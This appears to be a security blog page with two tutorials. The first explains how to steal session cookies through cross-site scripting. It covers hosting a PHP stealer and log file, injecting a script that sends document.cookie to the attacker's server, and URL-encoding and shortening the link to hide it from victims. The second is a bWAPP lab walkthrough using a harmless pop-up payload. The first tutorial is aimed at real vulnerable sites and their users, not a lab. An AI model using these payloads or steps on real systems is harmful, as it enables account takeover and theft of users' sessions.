Cookie Stealing From Cross Site Scripting ( xss ) Attack

Cookie Stealing From Cross Site Scripting (xss ) Attack

Hello Guys, In this post I will show you Cookie Stealing From Cross Site Scripting ( xss ) Attack. How Attacker can steal cookie from users ?. So I hope you are familiar with xss If not then please read our basic xss tutorial.

Pre-requisite :

  • A Cookie Stealer Code : Get It From Here
  • A Free Web Hosting.
  • Basic Knowledge About XSS Attack.

Cookie stealing is the process in which and attacker exploit the xss vulnerability and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

Creating PHP Cookie Stealer

 

  • Copy the cookie stealer code from here.
  • Open the notepad or any editor and paste the code.
  • Save the file with .php extension. Ex:- xss.php

Now create New file and save it as log.txt (leave it as blank). Don’t change the name , this is the file name what we give in php file.
Now we have Two Files : 1) xss.php 
                                      2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both the files for hosting files you can use free web hosting or you can do secure tunelling. After hosting domain the stealer will be at : www.domain.com/xss.php

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Now, we have set everything now we have to find vulnerable website to exploit to inject our malicious code.

<script>location.href = ‘http://www.site.com/xss.php?cookie=’+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don’t need to send any link to others.  Whoever visit the page, they will be vicim.

Reflected: In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Reflected XSS .

In Reflected, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;</script>

The above link is clearly shows the script. Attacker can encode this script in url encoding and and make short the link with url shortening service like tiny url and then send to victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim Open the link, his/her cookie will be stored in log.txt file.

 

Cross site scripting (XSS) Vulnerability

Cross site scripting (XSS) Vulnerability

Hello Guys , Welcome to Infosec Zone today I gonna show you Cross site scripting vulnerability which is one of the most dangerous vulnerability and listed in owasp top 10 read carefully try and practice. In this tutorial we will cover Reflected Cross site scripting in GET Method and Post Method.

What is cross site scripting ( XSS )

XSS is a Type of attack in which an attacker inject a malicious script in website. XSS occur when use web application in the form of browser side script to different end users.

Malicious script can access any cookies, session, tokens or other sensitive information e.t.c. It is caused by insufficient input validations in server side as well as client side.

There are basic two types of XSS

  • Reflected cross site scripting XSS Attack (Non-Persistent)
  • Stored cross site scripting XSS Attack (Persistent)

Read their more information in OWASP official website

So lets start Practical…

Here I am using bWAPP on my localhost you can use this or DVWA. But I thinks that bWAPP is quite much better than DVWA.

So in this practical we use this payload

<img src=lol.png onerror=prompt(document.domain) />

first select xss vulnerability to attack and start.

XSS

<img src=lol.png onerror=prompt(document.domain) />

Just paste this payload in first name and last name and click go as a result you can see that our code is executed and got a popup.cross site scripting Xss

great we had successfully XSSED…. 🙂

The above XSS was GET method. Lets start Post Method for Post Method the requirement is hackbar Addon in firefox. install it if you don’t have and follow me step by step.

just click on post data in hackbar and type any thing in both field and load URL you will see some thing like this.

xss attack

in post data add the payload. see in below image and execute

xss post 2

yeah our code is executed…Keep learning.. 🙂 and share it